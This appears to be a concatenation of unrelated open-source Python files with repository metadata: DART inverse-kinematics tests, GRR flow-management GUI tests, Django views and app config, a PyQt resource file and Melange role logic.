if InitHook.already_run_once:
return
# This initializes any class which inherits from InitHook.
InitHook().Init()
|
dartsim/dart
|
python/tests/unit/dynamics/test_inverse_kinematics.py
|
Python
|
bsd-2-clause
| 2,669
| 0.000749
|
import plat
|
form
import pytest
import math
import nump
|
y as np
import dartpy as dart
def test_solve_for_free_joint():
'''
Very simple test of InverseKinematics module, applied to a FreeJoint to
ensure that the target is reachable
'''
skel = dart.dynamics.Skeleton()
[joint0, body0] = skel.createFreeJointAndBodyNodePair()
ik = body0.getOrCreateIK()
assert ik.isActive()
tf = dart.math.Isometry3()
tf.set_translation([0, 0, 0.8])
tf.set_rotation(dart.math.AngleAxis(math.pi / 8.0, [0, 1, 0]).to_rotation_matrix())
ik.getTarget().setTransform(tf)
error_method = ik.getErrorMethod()
assert error_method.getMethodName() == 'TaskSpaceRegion'
[lb, ub] = error_method.getBounds()
assert len(lb) is 6
assert len(ub) is 6
error_method.setBounds(np.ones(6) * -1e-8, np.ones(6) * 1e-8)
[lb, ub] = error_method.getBounds()
assert lb == pytest.approx(-1e-8)
assert ub == pytest.approx(1e-8)
solver = ik.getSolver()
solver.setNumMaxIterations(100)
prob = ik.getProblem()
tf_actual = ik.getTarget().getTransform().matrix()
tf_expected = body0.getTransform().matrix()
assert not np.isclose(tf_actual, tf_expected).all()
success = solver.solve()
assert success
tf_actual = ik.getTarget().getTransform().matrix()
tf_expected = body0.getTransform().matrix()
assert np.isclose(tf_actual, tf_expected).all()
class FailingSolver(dart.optimizer.Solver):
def __init__(self, constant):
super(FailingSolver, self).__init__()
self.constant = constant
def solve(self):
problem = self.getProblem()
if problem is None:
print('[FailingSolver::solve] Attempting to solve a nullptr problem! We will return false.')
return False
dim = problem.getDimension()
wrong_solution = np.ones(dim) * self.constant
problem.setOptimalSolution(wrong_solution)
return False
def getType(self):
return 'FailingSolver'
def clone(self):
return FailingSolver(self.constant)
def test_do_not_apply_solution_on_failure():
skel = dart.dynamics.Skeleton()
[joint, body] = skel.createFreeJointAndBodyNodePair()
ik = body.getIK(True)
solver = FailingSolver(10)
ik.setSolver(solver)
dofs = skel.getNumDofs()
skel.resetPositions()
assert not ik.solveAndApply(allowIncompleteResult=False)
assert np.isclose(skel.getPositions(), np.zeros(dofs)).all()
assert not ik.solveAndApply(allowIncompleteResult=True)
assert not np.isclose(skel.getPositions(), np.zeros(dofs)).all()
if __name__ == "__main__":
pytest.main()
|
antonow/concept-to-clinic
|
interface/backend/cases/apps.py
|
Python
|
mit
| 85
| 0
|
from djan
|
go.apps import AppConfig
class CasesConfig
|
(AppConfig):
name = 'cases'
|
destijl/grr
|
grr/gui/plugins/flow_management_test.py
|
Python
|
apache-2.0
| 14,194
| 0.003382
|
#!/usr/bin/env python
"""Test the flow_management interface."""
import os
from grr.gui import gui_test_lib
from grr.gui import runtests_test
from grr.lib import action_mocks
from grr.lib import aff4
from grr.lib import flags
from grr.lib import flow
from grr.lib import hunts
from grr.lib import test_lib
from grr.lib.flows.general import filesystem as flows_filesystem
from grr.lib.flows.general import processes as flows_processes
from grr.lib.flows.general import transfer as flows_transfer
from grr.lib.flows.general import webhistory as flows_webhistory
from grr.lib.hunts import standard
from grr.lib.hunts import standard_test
from grr.lib.rdfvalues import client as rdf_client
from grr.lib.rdfvalues import flows as rdf_flows
from grr.lib.rdfvalues import paths as rdf_paths
class TestFlowManagement(gui_test_lib.GRRSeleniumTest,
standard_test.StandardHuntTestMixin):
"""Test the flow management GUI."""
def setUp(self):
super(TestFlowManagement, self).setUp()
with self.ACLChecksDisabled():
self.client_id = rdf_client.ClientURN("C.0000000000000001")
with aff4.FACTORY.Open(
self.client_id, mode="rw", token=self.token) as client:
client.Set(client.Schema.HOSTNAME("HostC.0000000000000001"))
self.RequestAndGrantClientApproval(self.client_id)
self.action_mock = action_mocks.FileFinderClientMock()
def testOpeningManageFlowsOfUnapprovedClientRedirectsToHostInfoPage(self):
self.Open("/#/clients/C.0000000000000002/flows/")
# As we don't have an approval for C.0000000000000002, we should be
# redirected to the host info page.
self.WaitUntilEqual("/#/clients/C.0000000000000002/host-info",
self.GetCurrentUrlPath)
self.WaitUntil(self.IsTextPresent,
"You do not have an approval for this client.")
def testPageTitleReflectsSelectedFlow(self):
pathspec = rdf_paths.PathSpec(
path=os.path.join(self.base_path, "test.plist"),
pathtype=rdf_paths.PathSpec.PathType.OS)
flow_urn = flow.GRRFlow.StartFlow(
flow_name=flows_transfer.GetFile.__name__,
client_id=self.client_id,
pathspec=pathspec,
token=self.token)
self.Open("/#/clients/C.0000000000000001/flows/")
self.WaitUntilEqual("GRR | C.0000000000000001 | Flows", self.GetPageTitle)
self.Click("css=td:contains('GetFile')")
self.WaitUntilEqual("GRR | C.0000000000000001 | " + flow_urn.Basename(),
self.GetPageTitle)
def testFlowManagement(self):
"""Test that scheduling flows works."""
self.Open("/")
self.Type("client_query", "C.0000000000000001")
self.Click("client_query_submit")
self.WaitUntilEqual(u"C.0000000000000001", self.GetText,
"css=span[type=subject]")
# Choose client 1
self.Click("css=td:contains('0001')")
# First screen should be the Host Information already.
self.WaitUntil(self.IsTextPresent, "HostC.0000000000000001")
self.Click("css=a[grrtarget='client.launchFlows']")
self.Click("css=#_Processes")
self.Click("link=" + flows_processes.ListProcesses.__name__)
self.WaitUntil(self.IsTextPresent, "C.0000000000000001")
self.WaitUntil(self.IsTextPresent, "List running processes on a system.")
self.Click("css=button.Launch")
self.WaitUntil(self.IsTextPresent, "Launched Flow ListProcesses")
self.Click("css=#_Browser")
# Wait until the tree has expanded.
self.WaitUntil(self.IsTextPresent, flows_webhistory.FirefoxHistory.__name__)
# Check that we can get a file in chinese
self.Click("css=#_Filesystem")
# Wait until the tree has expanded.
self.WaitUntil(self.IsTextPresent,
flows_filesystem.UpdateSparseImageChunks.__name__)
self.Click("link=" + flows_transfer.GetFile.__name__)
self.Select("css=.form-group:has(> label:contains('Pathtype')) select",
"OS")
self.Type("css=.form-group:has(> label:contains('Path')) input",
u"/dev/c/msn[1].exe")
self.Click("css=button.Launch")
self.WaitUntil(self.IsTextPresent, "Launched Flow GetFile")
# Test that recursive tests are shown in a tree table.
with self.ACLChecksDisabled():
flow.GRRFlow.StartFlow(
client_id="aff4:/C.0000000000000001",
flow_name=gui_test_lib.RecursiveTestFlow.__name__,
token=self.token)
self.Click("css=a[grrtarget='client.flows']")
# Some rows are present in the DOM but hidden because parent flow row
# wasn't expanded yet. Due to this, we have to explicitly filter rows
# with "visible" jQuery filter.
self.WaitUntilEqual("RecursiveTestFlow", self.GetText,
"css=grr-client-flows-list tr:visible:nth(1) td:nth(2)")
self.WaitUntilEqual("GetFile", self.GetText,
"css=grr-client-flows-list tr:visible:nth(2) td:nth(2)")
# Click on the first tree_closed to open it.
self.Click("css=grr-client-flows-list tr:visible:nth(1) .tree_closed")
self.WaitUntilEqual("RecursiveTestFlow", self.GetText,
"css=grr-client-flows-list tr:visible:nth(2) td:nth(2)")
# Select the requests tab
self.Click("css=td:contains(GetFile)")
self.Click("css=li[heading=Requests]")
self.WaitUntil(self.IsElementPresent,
"css=td:contains(flow:request:00000001)")
# Check that a StatFile client action was issued as part of the GetFile
# flow.
self.WaitUntil(self.IsElementPresent,
"css=.tab-content td.proto_value:contains(StatFile)")
def testOverviewIsShownForNestedFlows(self):
with self.ACLChecksDisabled():
for _ in test_lib.TestFlowHelper(
gui_test_lib.RecursiveTestFlow.__name__,
self.action_mock,
client_id=self.client_id,
token=self.token):
pass
self.Open("/#c=C.0000000000000001")
self.Click("css=a[grrtarget='client.flows']")
# There should be a RecursiveTestFlow in the list. Expand nested flows.
self.Click("css=tr:contains('RecursiveTestFlow') span.tree_branch")
# Click on a nested flow.
self.Click("css=tr:contains('RecursiveTestFlow'):nth(2)")
# Nested flow should have Depth argument set to 1.
self.WaitUntil(self.IsElementPresent,
"css=td:contains('Depth') ~ td:nth(0):contains('1')")
# Check that flow id of this flow has forward slash - i.e. consists of
# 2 components.
self.WaitUntil(self.IsTextPresent, "Flow ID")
flow_id = self.GetText("css=dt:contains('Flow ID') ~ dd:nth(0)")
self.assertTrue("/" in flow_id)
def testOverviewIsShownForNestedHuntFlows(self):
with self.ACLChecksDisabled():
|
with hunts.GRRHunt.StartHunt(
hunt_name=standard.GenericHunt.__name__,
flow_runner_args=rdf_flows.FlowRunnerArgs(
flow_name=gui_test_lib.RecursiveTestFlow.__name__),
client_rate=0,
token=self.token) as hunt:
hunt.Run()
self.AssignTasksToClients(client_ids=[self.client_id])
self.RunHunt(client_ids=[self.client_id])
self.Open("/#c=C.0000000000000001")
self.Click("css=a[grrtarget='c
|
lient.flows']")
# There should be a RecursiveTestFlow in the list. Expand nested flows.
self.Click("css=tr:contains('RecursiveTestFlow') span.tree_branch")
# Click on a nested flow.
self.Click("css=tr:contains('RecursiveTestFlow'):nth(2)")
# Nested flow should have Depth argument set to 1.
self.WaitUntil(self.IsElementPresent,
"css=td:contains('Depth') ~ td:nth(0):contains('1')")
# Check that flow id of this flow has forward slash - i.e. consists of
# 2 components.
self.WaitUntil(self.IsTextPresent, "Flow ID")
flow_id = self.GetText("css=dt:contains('Flow ID') ~ dd:nth(0)")
self.assertTrue("/" in flow_id)
def testLogsCanBeOpenedByClickingOnLogsTab(self):
# RecursiveTestFlow doesn't send any results back.
with self.ACLChecksDisabled():
for _ in test_lib.TestFlowHelper(
"FlowWithOneLogStatement",
self.action_mock,
client_id=self.clien
|
chenqi123/ipaas
|
example/views.py
|
Python
|
apache-2.0
| 6,131
| 0.047953
|
from django.shortcuts import render
# Create your views here.
def proindex(request):
return render(request, 'example/probase.html' )
def index(request):
return render(request, 'e_index.html' )
def badges_labels(request):
return render(request, 'badges_labels.html' )
def four(request):
return render(request, '404.html' )
def five(request):
return render(request, '500.html' )
def basic_gallery(request):
return render(request, 'basic_gallery.html' )
def buttons(request):
return render(request, 'buttons.html' )
def calendar(request):
return render(request, 'calendar.html' )
def carousel(request):
return render(request, 'carousel.html' )
def chat_view(request):
return render(request, 'chat_view.html' )
def code_editor(request):
return render(request, 'code_editor.html' )
def contacts(request):
return render(request, 'contacts.html' )
def css_animation(request):
return render(request, 'css_animation.html' )
def draggable_panels(request):
return render(request, 'draggable_panels.html' )
def empty_page(request):
return render(request, 'empty_page.html' )
def faq(request):
return render(request, 'faq.html' )
def file_manager(request):
return render(request, 'file_manager.html' )
def form_advanced(request):
return render(request, 'form_advanced.html' )
def form_avatar(request):
return render(request, 'form_avatar.html' )
def form_basic(request):
return render(request, 'form_basic.html' )
def form_builder(request):
return render(request, 'form_builder.html' )
def form_editors(request):
return render(request, 'form_editors.html' )
def form_file_upload(request):
return render(request, 'form_file_upload.html' )
def form_markdown(request):
return render(request, 'form_markdown.html' )
def form_simditor(request):
return render(request, 'form_simditor.html' )
def form_validate(request):
return render(request, 'form_validate.html' )
def form_webuploader(request):
return render(request, 'form_webuploader.html' )
def form_wizard(request):
return render(request, 'form_wizard.html' )
def forum_main(request):
return render(request, 'forum_main.html' )
def graph_echarts(request):
return render(request, 'graph_echarts.html' )
def graph_flot(request):
return render(request, 'graph_flot.html' )
def graph_morris(request):
return render(request, 'graph_morris.html' )
def graph_peity(request):
return render(request, 'graph_peity.html' )
def graph_rickshaw(request):
return render(request, 'graph_rickshaw.html' )
def graph_sparkline(request):
return render(request, 'graph_sparkline.html' )
def grid_options(request):
return render(request, 'grid_options.html' )
def iconfont(request):
return render(request, 'iconfont.html' )
def icons(request):
return render(request, 'icons.html' )
def index_1(request):
return render(request, 'index_1.html' )
def index_2(request):
return render(request, 'index_2.html' )
def index_3(request):
return render(request, 'index_3.html' )
def index_4(request):
return render(request, 'index_4.html' )
def invoice(request):
return render(request, 'invoice.html' )
def invoice_print(request):
return render(request, 'invoice_print.html' )
def layer(request):
return render(request, 'layer.html' )
def layerdate(request):
return render(request, 'layerdate.html' )
def layouts(req
|
uest):
return render(request, 'layouts.html' )
def lockscreen(request):
return render(request, 'lockscreen.html' )
def login(request):
return render(request, 'login.html' )
def mailbox(request):
return render(request, 'mailbox.html'
|
)
def mail_compose(request):
return render(request, 'mail_compose.html' )
def mail_detail(request):
return render(request, 'mail_detail.html' )
def modal_window(request):
return render(request, 'modal_window.html' )
def nestable_list(request):
return render(request, 'nestable_list.html' )
def notifications(request):
return render(request, 'notifications.html' )
def pin_board(request):
return render(request, 'pin_board.html' )
def profile(request):
return render(request, 'profile.html' )
def projects(request):
return render(request, 'projects.html' )
def project_detail(request):
return render(request, 'project_detail.html' )
def register(request):
return render(request, 'register.html' )
def search_results(request):
return render(request, 'search_results.html' )
def table_basic(request):
return render(request, 'table_basic.html' )
def table_data_tables(request):
return render(request, 'table_data_tables.html' )
def table_jqgrid(request):
return render(request, 'table_jqgrid.html' )
def tabs_panels(request):
return render(request, 'tabs_panels.html' )
def timeline(request):
return render(request, 'timeline.html' )
def timeline_v2(request):
return render(request, 'timeline_v2.html' )
def toastr_notifications(request):
return render(request, 'toastr_notifications.html' )
def tree_view(request):
return render(request, 'tree_view.html' )
def tree_view_v2(request):
return render(request, 'tree_view_v2.html' )
def typography(request):
return render(request, 'typography.html' )
def validation(request):
return render(request, 'validation.html' )
def webim(request):
return render(request, 'webim.html' )
def widgets(request):
return render(request, 'widgets.html' )
|
splotz90/urh
|
src/urh/ui/urh_rc.py
|
Python
|
gpl-3.0
| 463,208
| 0.000011
|
# -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.9.2)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x07\x27\
\x00\
\x00\x1a\x8b\x78\x9c\xe5\x58\xdd\x8f\xdb\x36\x12\x7f\xdf\xbf\x82\
\x55\x1f\xd2\x43\x2d\x8a\xa4\x3e\x28\x69\xed\x2d\xd0\xa4\x69\xf2\
\x50\xa0\x68\xd2\x14\xb8\x37\xad\x44\xdb\xba\xe8\xc3\x90\xe4\xb5\
\x9d\xbf\xfe\x86\xd4\x07\x29\xdb\x1b\x5f\x0e\xc5\x3d\xdc\x0a\xbb\
\x58\x71\x38\xc3\x99\xe1\x0c\x7f\x3f\x6a\x97\x3f\x1d\xcb\x02\x3d\
\x89\xa6\xcd\xeb\x6a\x65\x51\x4c\x2c\x24\xaa\xb4\xce\xf2\x6a\xb3\
\xb2\xfe\xfc\xf8\xd6\x0e\x2d\xd4\x76\x49\x95\x25\x45\x5d\x89\x95\
\x55\xd5\xd6\x4f\x0f\x77\xcb\xef\x6c\x1b\xbd\x6e\x44\xd2\x89\x0c\
\x1d\xf2\x6e\x8b\xde\x57\x9f\xdb\x34\xd9\x09\xf4\xc3\xb6\xeb\x76\
\xb1\xe3\x1c\x0e\x07\x9c\x0f\x42\x5c\x37\x1b\xe7\x1f\xc8\xb6\x1f\
\xee\xee\x96\xed\xd3\xe6\x0e\x21\x04\x7e\xab\x36\xce\xd2\x95\x35\
\x18\xec\xf6\x4d\xa1\x14\xb3\xd4\x11\x85\x28\x45\xd5\xb5\x0e\xc5\
\xd4\xb1\xb4\x7a\xaa\xd5\x53\xe9\x3d\x7f\x12\x69\x5d\x96\x75\xd5\
\x2a\xcb\xaa\xfd\xde\x50\x6e\xb2\xf5\xa4\x2d\xa3\x39\xb8\x4a\x89\
\x46\x51\xe4\x10\xe6\x30\x66\x83\x86\xdd\x9e\xaa\x2e\x39\xda\x73\
\x53\x88\xf1\x9a\x29\x23\x84\x38\x30\xa7\x35\xff\x33\xad\xb8\x85\
\x0d\xdd\xc1\xef\xa4\x3e\x0a\x70\x5b\xef\x9b\x54\xac\xc1\x4e\xe0\
\x4a\x74\xce\x9b\x8f\x6f\xa6\x49\x9b\xe0\xac\xcb\x8c\x65\xc6\xfd\
\x9c\x79\x9d\x6d\x72\x95\x94\xa2\xdd\x25\xa9\x68\x9d\x51\xae\xec\
\x0f\x79\xd6\x6d\xa1\xbe\xc1\xee\xa8\xc6\x5b\x91\x6f\xb6\x9d\x21\
\x78\xca\xc5\xe1\xe7\xfa\xb8\xb2\x08\x22\x88\x06\xf0\xd3\x8b\x75\
\x67\x50\x25\xc8\xb3\x95\xf5\xe1\xd3\xaf\x7f\xd4\x75\xd7\x8f\x07\
\x2f\xf1\xa4\x49\x70\xc4\x30\x45\x8d\x9a\x1e\x53\x89\xb3\x3a\x95\
\xb1\xad\xac\x4c\xf4\xdd\x85\xc7\x1d\x9a\x56\x10\xc7\x5d\xdd\x74\
\xf6\x3a\x2f\x44\xaf\xea\x6c\xeb\x52\x38\xff\xaa\x85\xf3\xeb\xfb\
\x8f\xce\xbe\xd9\x3a\x59\xd2\x25\x4e\x9e\x42\xbd\x1d\x73\x1d\xbc\
\xab\xae\xaf\x75\xcc\x76\xb0\xe7\x91\x87\xc3\x10\xaa\x1e\x5d\xd5\
\x39\x9d\xe9\x3c\x80\xd2\x72\x8a\x5b\x46\x92\xc9\xcd\x91\xa6\x7d\
\xfa\x8f\x49\xdb\x6f\x2a\x42\xbb\x64\x03\x61\x14\x75\xb3\xb2\xbe\
\x5f\xab\x67\x98\x78\xac\x9b\x4c\x34\xe3\x54\xa0\x9e\xd9\x54\x0d\
\x45\xca\xbb\x53\x7f\xe4\x86\xb5\xc7\xc0\xe4\xaa\xd3\x3c\xb9\x3e\
\xdf\x6e\x93\xac\x3e\xac\x2c\x76\x3e\xf9\xa5\xae\x4b\x59\xd7\x73\
\x79\x0a\xb5\x65\x38\xf4\x5c\xee\x5f\x4c\x81\x1b\x06\x7e\x02\x76\
\x31\x05\x65\xdb\xcb\x93\x68\xef\xab\xbc\x83\x6e\x1f\xba\xc5\x34\
\xde\x37\x8d\x54\x28\x92\x93\x80\x5c\xd5\x9f\x31\xa8\x76\x5b\x1f\
\x36\x8d\xdc\xb3\x75\x52\x4c\x9b\x36\x99\x1e\xf2\x0a\x72\xb0\xc7\
\xde\x8c\xd8\x45\xa6\x83\xc6\xd4\xad\xd4\xa3\xcf\xa8\xc8\xce\x7d\
\x66\xea\xf4\xfc\x54\x99\x1c\xf3\x32\xff\x22\x20\xc2\x8b\x85\x65\
\xe0\xf6\xe3\xa3\x3c\x13\x5d\xb3\x17\x66\x4a\xfb\x3c\x13\xed\x98\
\x14\x72\x54\xc7\x64\x62\xdd\xea\x1e\x91\x23\xd7\x1d\xe7\x4a\xd1\
\x25\xb2\x75\xf5\xfc\x28\x71\x03\xd5\x6f\xa0\x03\x58\x14\xff\xf1\
\xe6\x6d\x3f\x82\x71\x9a\xc6\x7f\xd5\xcd\xe7\x61\x08\x8f\x54\x48\
\x1e\xeb\x3d\xec\x83\xf5\x30\x89\x97\x59\x1a\x03\x7a\x94\x49\xf7\
\x90\x97\xd0\x17\x12\x78\x7e\x04\xb4\x58\x3a\x7a\x62\xa6\xdc\x9d\
\x76\x42\x2f\xda\x2f\xdb\x88\x1e\x86\xae\x62\x71\x96\x96\xb9\x34\
\x72\x3e\x74\x79\x51\xbc\x97\x4e\x86\xbc\x8c\x45\xf3\xae\x10\x5a\
\xb8\x74\x86\xe8\x87\xdc\x1c\x23\xb9\xa5\x33\xe6\xae\x46\x1b\xbd\
\x27\xaa\x75\xae\x94\xa1\xde\xef\xca\x3a\x13\x83\xc2\xf9\x7c\x91\
\x3c\x8a\x62\x65\xfd\xf2\x28\x2a\x81\xe8\xb4\x9b\x22\xed\xc6\x08\
\xe5\xda\x72\xcc\xc7\xb6\x34\xe0\x10\xd3\x70\x3a\x0f\x1a\x15\x01\
\xbf\x98\x96\x1a\xad\x85\x10\x34\x13\x9f\x06\x6d\x77\x2a\x20\xae\
\xb6\x6b\xea\xcf\xa2\xef\xe3\x98\x60\x9f\x7b\xbe\x47\xf8\x54\x7d\
\x67\x33\xcb\xf4\x56\x62\xd9\xd9\x21\xba\x9e\x29\x1b\x33\xdd\x8c\
\xc1\x24\x4d\x9e\xd8\x83\x0e\x25\xf4\x3c\xc8\x75\x0d\x87\x54\xbd\
\xc7\x95\x6c\x8b\xe2\x5e\x49\x9e\xa4\x59\xd5\xcd\x64\x07\xb5\x0d\
\x71\x40\xc8\xfd\x60\xd5\x88\x2e\xdd\xce\x74\x5a\x38\x35\x71\xb8\
\x3b\xde\x17\x79\x25\x86\x03\x1a\x53\xcc\xfc\x7e\x7a\x9d\x94\x79\
\x71\x8a\x5f\x7d\x50\x7d\x85\x5e\x43\x9a\xe8\xf7\xa6\x7e\x75\x6f\
\x8f\xe9\xd8\xfd\x32\x3b\x91\xe6\xeb\x3c\x05\x2a\xaf\xab\x0b\x75\
\xf4\x41\x94\xb9\xfd\x73\x5d\x64\xaf\xee\x0b\xd1\x75\xa2\xb1\x25\
\xb9\x01\xea\xc7\x04\x5c\x1f\x00\x49\x67\x02\xa0\x8e\x22\x1e\x80\
\x58\x0d\xec\x01\x46\x63\x7a\xdf\x17\x09\x72\xa8\x84\x65\x76\x46\
\x27\x8e\x9d\x4f\xa7\x13\xb5\xdc\x25\xdd\x56\x9f\x0f\x50\xf8\x0d\
\x11\xec\xba\x9e\x0b\x0f\x5d\x04\x58\x02\x28\x7a\x87\x3c\x1c\x04\
\x1e\xd0\x45\x88\x3e\x21\x1f\x53\x2f\x92\x42\x17\xbb\x91\x0f\x48\
\xef\x83\x10\xfa\x80\x11\x1a\x04\x21\x87\x09\x86\x19\x8d\x24\x07\
\xa0\xd7\x88\x62\xee\x33\xc9\x34\x0b\x82\x43\xa2\x54\x80\x6e\x31\
\x0b\x03\xe9\x02\x84\x51\x10\x4a\xa1\x2f\x97\xe0\x81\xd4\xe4\x0b\
\x60\x89\x28\x0c\x5d\x57\xae\xcc\x30\x09\x95\x06\x2c\x0c\x8b\x45\
\x44\xda\x99\x61\xe8\x78\xd1\x3f\x2d\x9d\xcb\x7f\xdd\x08\xd1\xcd\
\x46\x88\xb0\xab\x1e\xc2\x64\x15\xfe\xc6\x06\x78\x27\x92\xa7\xd3\
\xab\xa9\xb0\x70\xb3\x22\x46\x46\xb2\x7e\xb2\x5e\x70\xde\x98\x81\
\x49\x97\x35\x2c\x51\x88\x09\xa3\xae\xef\x46\x50\x42\x5f\x6e\x53\
\x0a\x7b\xe7\x46\x44\x16\x65\x41\x60\x4f\xfb\x04\xe8\xc2\x86\xad\
\xe6\xea\xdd\x14\xba\x72\xff\x55\x01\xc9\xc2\x86\x02\x30\x1f\xe4\
\x0c\xc1\x0d\x2d\xf2\x98\xac\xb8\x52\xe9\x5f\x5d\x64\xcf\x2d\x27\
\xb1\xe9\x71\xd2\x61\xb2\xb8\x74\x70\x69\x48\x0d\x43\xb2\x18\x5d\
\xc2\xfb\xe0\x31\x58\xe8\x98\x66\x46\x83\xec\x0b\x2a\x65\xac\xd0\
\x58\x10\x67\x2a\x23\xf5\x22\x6f\xf4\x0d\x8b\xd0\x7e\x00\xaf\x6e\
\x24\xaf\xc4\xd1\x4c\x4a\x71\xd8\x5f\x5a\xfa\x35\x3c\xee\xf5\x03\
\xec\x31\x35\x49\xc9\x30\x36\x2d\x26\x61\xef\x89\x83\x27\xad\x20\
\x9b\xd2\x34\x30\xf4\x17\xa3\x03\xae\xc2\x54\xd1\x44\x0b\x1d\x82\
\x3d\xb3\x1a\x84\x53\x7e\xb4\xd7\x87\x1c\x65\x74\x51\x7f\x88\xe0\
\xbd\x0f\x99\xcb\x0c\x99\xda\x13\x3e\x17\x0e\xaf\x72\x11\x30\xf4\
\xf8\xb8\x07\xae\xaa\x85\xa7\x55\x54\x00\x17\x86\x4a\xaa\xfd\x69\
\xf9\x42\xfb\x9b\x09\x47\x33\xb2\x90\xee\x42\x34\x7a\x72\x17\x46\
\x2c\x17\xfa\x1c\x7d\x79\x29\x47\xd8\xbb\x71\x84\x29\x05\x48\xe5\
\xc4\x9b\x50\x78\x0b\x28\x0c\x01\xcb\x4d\x32\xd0\x8f\x7a\xd8\x07\
\xa8\xe4\x67\x20\xbc\x95\xc7\x8f\x72\x85\xc0\x0c\xce\x90\xcf\x49\
\x38\x43\x60\x06\x4d\x18\xc9\xd5\x0d\x04\x06\x97\x80\xc0\x52\x53\
\x03\xf0\x93\x6c\xe2\x50\xd5\x1d\x16\x85\xf3\x45\xe7\xf8\xab\x1c\
\x79\x7e\xf0\x72\x0a\x17\x4c\x85\x1b\xee\x3a\xcf\x5d\x4b\x08\x25\
\xff\x8b\x6b\xc9\x6c\x47\xfe\x3f\xee\x27\x36\xf9\xca\x0d\xa5\x44\
\xb2\x77\x43\x02\xdd\xb7\xa0\x3e\xe6\x24\xe2\xcf\xd0\x1b\xd3\xf4\
\x66\xca\x46\xd6\x30\xc8\xcd\xd3\xdc\x16\x4c\x24\xc6\x4d\x7e\x32\
\x84\xa3\x2b\x3e\xe3\xb5\x70\x22\xb6\x99\x70\x32\xd3\xac\x36\x91\
\x9a\x1f\x4e\x0c\x86\xe6\x26\xbd\xec\x39\x52\xe3\x26\xa9\xf1\x9e\
\xd4\xd8\x4c\x32\x12\x87\xc1\x67\x7c\x4e\x67\x1c\xcd\xd5\x47\x99\
\xa6\xcd\x9b\x64\xc6\x0d\x2e\xeb\xe9\x61\x22\xac\x6b\x24\x66\x70\
\x18\x7b\x86\xbe\x02\x4d\x5f\x73\xd9\x48\xc8\x3d\x79\x85\x9a\xb8\
\xdc\x69\x76\xc6\x3f\x33\xe1\x15\xda\xe2\x23\x6d\xf1\xb9\x6c\x30\
\x3a\x27\x2d\x6f\xa1\x43\x38\xd7\x7e\x41\xc8\x17
|
\xdd\xa0\x2c\x1f\
\x98\xc2\xe5\x6e\x10\xc9\x73\xe9\x47\x9c\x6b\xce\x0a\x28\x30\x89\
\xec\xe4\x50\xde\xe3\x23\x38\x14\x3e\xe1\x84\x02\x8f\x44\x38\x08\
\x89\x1b\xc8\xef\x06\x0e\x9d\x12\x81\x78\x6c\xf6\x60\x2a\x95\xaa\
\xb8\xaa\xa2\xaa\x85\x6a\x01\x8a\x03\x75\x8a\xa4\x82\xcf\x55\x2d\
\x35\x59\xa9\xd5\x3c\x37\x82\x68\xe4\x37\x0b\xb0\xa4\x2b\x71\xe2\
\x9d\x8e\xf1\xc5\x7c\x2c\xc0\xe7\xde\x8d\x9b\x86\x8b\x03\x4e\x
|
b8\
\xcf\x2f\xe1\x94\x6b\x34\xf5\x2e\xc1\xd4\xbb\x81\xa5\xfc\x0a\x94\
\x7a\xd7\x90\xd4\x04\xd2\x2b\x30\xfa\x35\x10\xe5\x97\x10\x7a\x1b\
\x40\x4d\xfc\xbc\x80\xcf\x6f\x43\xcf\x4b\xf0\x34\x3e\x04\xf8\x1c\
\x3a\xf9\xb7\x20\x27\xbf\x01\x9c\x9e\xc6\x4d\x7e\x09\x9b\xfc\xab\
\xa8\x79\x05\x34\xf9\x35\xcc\x34\x21\xf3\x0a\x62\x3e\x0f\x98\x97\
\x78\xf9\xf2\xe0\xd2\x77\xcf\x2f\x8a\xea\xcf\x52\xfe\xcf\xf2\xe1\
\xee\xdf\xfd\xc3\x1d\x1c\
\x00\x00\x0d\x5e\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\
|
MatthewWilkes/mw4068-packaging
|
src/melange/src/soc/logic/models/role.py
|
Python
|
apache-2.0
| 4,706
| 0.006587
|
#!/usr/bin/env python2.5
#
# Copyright 2008 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Role (Model) query functions.
"""
__authors__ = [
'"Daniel Hans" <daniel.m.hans@gmail.com>',
'"Sverre Rabbelier" <sverre@rabbelier.nl>',
'"Lennard de Rijk" <ljvderijk@gmail.com>',
]
from soc.cache import sidebar
from soc.logic.models import base
import soc.models.role
DEF_LAST_RESIGN_ERROR_FMT = "This user can't be " \
"resigned, please make sure it's not the last %(name)s."
ROLE_LOGICS = {}
SUGGESTED_FIELDS = ['given_name', 'surname', 'name_on_documents', 'phone',
'im_network', 'im_handle', 'home_page', 'blog', 'photo_url', 'latitude',
'longitude', 'email', 'res_street', 'res_city', 'res_state', 'res_country',
'res_postalcode', 'ship_street', 'ship_city', 'ship_state', 'ship_country',
'ship_postalcode', 'birth_date', 'tshirt_size', 'tshirt_style'
]
def registerRoleLogic(role_logic):
"""Adds the specified Role Logic to the known ones.
Args:
role_logic: Instance of or subclass from Role Logic
"""
global ROLE_LOGICS
name = role_logic.role_name
ROLE_LOGICS[name] = role_logic
class Logic(base.Logic):
"""Logic methods for the Role model.
"""
def __init__(self, model=soc.models.role.Role,
base_model=None, scope_logic=None, role_name=None,
disallow_last_resign=False):
"""Defines the name, key_name and model for this entity.
Args:
role_name: The name of this role used for instance for Requests
dissallow_last_resign: Iff True and a given role entity is the last of
its kind in its scope then this role can not be resigned.
"""
super(Logic, self).__init__(model, base_model=base_model,
scope_logic=scope_logic)
self.role_name = role_name
registerRoleLogic(self)
self.disallow_last_resign = disallow_last_resign
def _updateField(self, entity, entity_properties, name):
"""Special logic for role. If status changes to active we flush the sidebar.
